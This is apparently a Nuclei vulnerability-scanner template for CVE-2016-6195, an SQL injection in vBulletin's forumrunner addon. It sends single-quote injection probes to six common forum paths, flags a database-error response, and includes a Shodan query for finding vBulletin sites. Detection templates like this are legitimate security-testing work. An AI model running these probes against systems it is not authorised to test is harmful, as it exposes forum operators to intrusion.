id: CVE-2016-6195

info:
  name: vBulletin <= 4.2.3 - SQL Injection
  author: MaStErChO
  severity: high
  description: |
    vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database.
  reference:
    - https://www.cvedetails.com/cve/CVE-2016-6195/
    - https://www.exploit-db.com/exploits/38489
    - https://www.securityfocus.com/bid/94312
    - https://enumerated.wordpress.com/2016/07/11/1/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-6195
    cwe-id: CWE-89
  metadata:
    verified: 'true'
    shodan-query: title:"Powered By vBulletin"
  tags: cve,cve2016,vbulletin,sqli,forum,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
      - "{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
      - "{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
      - "{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
      - "{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
      - "{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "type=dberror"

      - type: status
        status:
          - 200
          - 503
        condition: or